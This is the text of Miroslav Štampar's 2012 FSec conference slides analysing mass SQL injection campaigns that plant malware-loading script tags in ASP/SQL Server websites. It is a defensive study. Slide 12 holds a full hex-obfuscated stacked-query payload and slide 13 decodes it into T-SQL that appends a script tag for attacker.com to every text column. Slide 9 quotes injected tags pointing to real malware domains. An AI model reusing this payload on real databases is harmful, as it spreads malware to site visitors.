These are the slides from a talk "Analysis of mass SQL injection attacks" held at FSec 2012 conference (Croatia / Varazdin 21st September 2012) by Miroslav Stampar

1. Analysis of mass SQL
injection attacks
Miroslav Štampar
(dev@sqlmap.org)

2. FUD (Fear, Uncertainty, Doubt)
 “A new virus is making the rounds and is
wreaking havoc on the Internet”
 “Whatever language is used to write to the
database, all SQL databases use the same
basic formulas for writing and retrieving data”
 “Targets that bottleneck in the technology,
making it platform-independent… Whether the
machine is using ASP, ColdFusion, JSP, PHP, or
whatever else”
 “...blazing through the internet, infecting more
than half a million domains around the world to
date and as many as 1.5 million URLs”
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 2

3. Google is (not) your friend (1)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 3

4. Google is (not) your friend (2)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 4

5. Google is (not) your friend (3)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 5

6. What's it all about?
 Platform dependent (IIS/ASP(.NET))
 DBMS dependent (Microsoft SQL Server)
 Highly automated (tool-based) approach
 Popular SQL enumeration tools with or without
Google search capability don't count (e.g.
sqlmap, Havij, Pangolin)
 Infection(s) counting in thousands of domains
(not millions as previously believed)
 Dummy as it can be (usually one request per
target)
 In short: malware distribution
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 6

7. Modus operandi
 Get hands on couple of 1-day exploits
 Blindly inject SQL payload carrying malicious
content (<script>, <iframe>, etc.) into
content tables of as much as possible
vulnerable web servers
 Leverage exploit(s) and/or user's lack of
technical knowledge to install malware
(spyware, trojans, etc.) to visitor's computer
 Profit(???) - (DEFCON 18 – Garry Pejski:
“My Life As A Spyware Developer”)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 7

8. Sample leveraged exploits
 CVE-2012-4681 Oracle Java 7 Update 6
 CVE-2012-1889 Microsoft XML Core Services
 CVE-2012-1723 Java Runtime Environment
 CVE-2012-0507 Java Runtime Environment
 CVE-2011-3544 Java Runtime Environment
 CVE-2011-2110 Adobe Flash Player
 CVE-2011-0611 Adobe Flash Player
 CVE-2010-3552 New Java Plug-in
 CVE-2010-0188 Adobe Reader
 etc.
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 8

9. Notable members (1)
 Lilupophilupop (sl.php)
 "></title><script
src="http://lilupophilupop.com/sl.php"></script><!--
 Nikjju (r.php)
 <script src=http://nikjju.com/r.php></script>
 Robint (u.js)
 <script src=http://ww.robint.us/u.js></script>
 LizaMoon (ur.php)
 </title><script src=http://lizamoon.com/ur.php></script>
 Jjghui (urchin.js)
 </title><script src=http://jjghui.com/urchin.js></script>
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 9

10. Notable members (2)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 10

11. Notable members (3)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 11

12. Generic payload (obfuscated)
GET /vuln.asp?param=1;DECLARE @S VARCHAR(4000);SET
@S=CAST(0x4445434C415245204054205641524348415228323535292C40
4320564152434841522832353529204445434C415245205461626C655F43
7572736F7220435552534F5220464F522053454C45435420612E6E616D65
2C622E6E616D652046524F4D207379736F626A6563747320612C73797363
6F6C756D6E73206220574845524520612E69643D622E696420414E442061
2E78747970653D27752720414E442028622E78747970653D3939204F5220
............................................................
5845432827555044415445205B272B40542B275D20534554205B272B4043
2B275D3D525452494D28434F4E5645525428564152434841522834303030
292C5B272B40432B275D29292B27273C736372697074207372633D687474
703A2F2F7777772E63686B6164772E636F6D2F622E6A733E3C2F73637269
70743E27272729204645544348204E4558542046524F4D205461626C655F
437572736F7220494E544F2040542C404320454E4420434C4F5345205461
626C655F437572736F72204445414C4C4F43415445205461626C655F4375
72736F7220 AS VARCHAR(4000));EXEC(@S);--
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 12

13. Generic payload (decoded)
DECLARE @t VARCHAR(255), @c VARCHAR(255)
DECLARE table_cursor CURSOR FOR
SELECT a.name, b.name FROM sysobjects a,syscolumns b WHERE
a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or
b.xtype=231 or b.xtype=167) /* NTEXT, TEXT, NVARCHAR,
VARCHAR */
OPEN table_cursor FETCH NEXT FROM table_cursor INTO @t,@c
WHILE(@@FETCH_STATUS=0) BEGIN
EXEC('UPDATE ['+@t+'] SET ['+@c+']=RTRIM(CONVERT(VARCHAR,
['+@c+']))+''<script
src=http://www.attacker.com/malicious.js></script>''')
FETCH NEXT FROM table_cursor INTO @t,@c
END
CLOSE table_cursor
DEALLOCATE table_cursor
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 13

14. Analysis (1)
 Piggy backing (stacked) SQL injection
 Obfuscated SQL code (hex encoded)
 Decoded code dynamically executed with T-
SQL EXEC command
 Usage of cursor for update
 Iterating over all tables / all text-like columns
 Appending malicious content (e.g. <script
src=...) to all matched column entries using
UPDATE statement
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 14

15. Analysis (2)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 15

16. Analysis (3)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 16

17. Example (1) - FAIL
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 17

18. Example (2) - FAIL
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 18

19. Example (3) - FAIL
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 19

20. Example (4) – CLUSTER FAIL
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 20

21. Example (5) - SUCCESS
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 21

22. Example (6) - SUCCESS
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 22

23. Asprox (1)
 Spam botnet used for phishing scams (>10K
bots)
 Developed over years
 Interesting update “msscntr32.exe” (SQL
attack tool)
 Google search for targets (e.g. inurl:".asp")
 Launch SQL injection attacks against resulting
pages
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 23

24. Asprox (2)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 24

25. CLI (1)
 Standalone executable
 Rare beast (Chinese underground forums?)
 Google search for targets (e.g.: inurl:".asp"
inurl:"a=")
 Configurable malicious tag that will be inserted
(originally <script
src=http://www.2117966.net/fuckjp.js></s
cript>)
 Wild guess is that attackers are being paid for
using the tool (backcall to *.cn/pay.asp?
SN=...)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 25

26. CLI (2)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 26

27. Sample tool (1)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 27

28. Sample tool (2)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 28

29. Sample tool (3)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 29

30. Sample tool (4)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 30

31. Sample tool (5)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 31

32. Sample run (1)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 32

33. Sample run (2)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 33

34. Sample run (3)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 34

35. Sample run (4)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 35

36. Sample run (5)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 36

37. Sample run (6)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 37

38. Sample run (7)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 38

39. Sample run (8)
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 39

40. Questions?
FSec – FOI 2012, Varaždin (Croatia) September 21st, 2012 40